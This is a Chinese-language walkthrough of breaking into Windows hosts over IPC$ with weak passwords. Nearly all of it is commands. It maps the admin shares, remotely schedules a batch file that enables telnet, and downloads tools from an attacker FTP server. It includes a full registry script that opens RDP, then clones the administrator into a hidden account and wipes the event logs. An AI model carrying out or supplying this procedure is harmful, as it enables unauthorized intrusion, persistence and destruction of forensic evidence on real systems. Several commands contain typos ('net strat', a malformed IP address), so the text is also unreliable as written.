IPC入侵实例

IPC入侵

第一步:采用X-Scan扫描漏洞主机,选取开放139/445端口的主机为入侵对象,且主机存在弱口令或者知道主机的登录账户和密码。

第二步:建立IPC连接,使用如下命令。

   net  use  \\192.168.10.128\ipc$  "123456"  /user:"administrator"  (当用户名和密码不包括空格是可以省略" "。

第三步:可以将主机的磁盘映射到本地。

 net use F:  \\192.168.10.128\C$  注意:远程主机的C盘映射到本地的F盘

 net use H:  \\192.168.10.128\admin$  注意:远程的windows\system32目录映射到H盘

 第四步:上传脚本telnet.bat,开启telnet服务。

     copy  telnet.bat  \\192.168.10..128\admin$ 

telnet.bat的内容如下:

sc config tlntsvr start=  auto (start后有空格)

net strat "telnet" 

注意:一般情况telent服务是给禁止的,直接采用net strat "telnet" 命令不能启动,要用sc服务配置命令改变服务的状况后才能用net strat "telnet" 。

第五步:创建计划执行telnet.bat脚本。

      at  \\192.168.10.128 11:00  telnet.bat 

 第六步:用telnet远程登录目标主机。

      Telnet 192.168.10.128 之后得到输入用户名和密码的命令提示行

 第七步:登录事先搭建好的ftp服务器或tftp服务器,下载开启3389端口的脚本和管理账户克隆工具mt.exe或者AIO和日志清除工具elsave.exe 

         > ftp

         >open 192.16810.129 

         >mget 3389.bat  mt .exe  elsave.exe    c:\  (下载3389.bat、mt.exe、elsave.exe到目标主机的C盘下)

注:3389.bat具体内容如下 

@echo off

 echo Windows Registry Editor Version 5.00>>3389.reg 

 echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg 

 echo "fDenyTSConnections"=dword:00000000>>3389.reg 

 echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg 

 echo "PortNumber"=dword:00000d3d>>3389.reg 

 echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg 

 echo "PortNumber"=dword:00000d3d>>3389.reg

 regedit /s 3389.reg 

第八步:执行3389.bat脚本和mt.exe

        mt -clone  administrator IUSR_XODU5PTT910NHOO

        net user IUSR_XODU5PTT910NHOO 123456

第九步:克隆成功后,用IUSR_XODU5PTT910NHOO远程登录(mstsc)目标主机。     

第十步:清除日志。

      elsave  application  -C

      elsave  system  -C

      elsave  security  -C 

 

环境:上述事例是在目标主机没有安装杀毒软件,没有启用防火墙的情况下。

错误代码:

53    目标主机可能没有启用lanmanserver,其显示名:Server

67   自己lanmanworkstation服务未启动(显示名:workstation)或者目标删除了IPC$或者是低版本的系统无法向高版本的系统发起连接,XP无法向server2003发起连接,server2003无法向server 2008连接,但是高版本的可以向下发起连接。

1792  网络登录服务没有启动,即目标的NetLogon服务未启动。

1326  未知的用户名或错误密码错误号1326,未知的用户名或错误密码

net view \\IP  查看对方开放的共享资源

net time \\IP 查看对方的时间

net use c: /del 删除映射的c盘,其他盘类推 
net use * /del /y删除全部

你可能感兴趣的:(网络安全类)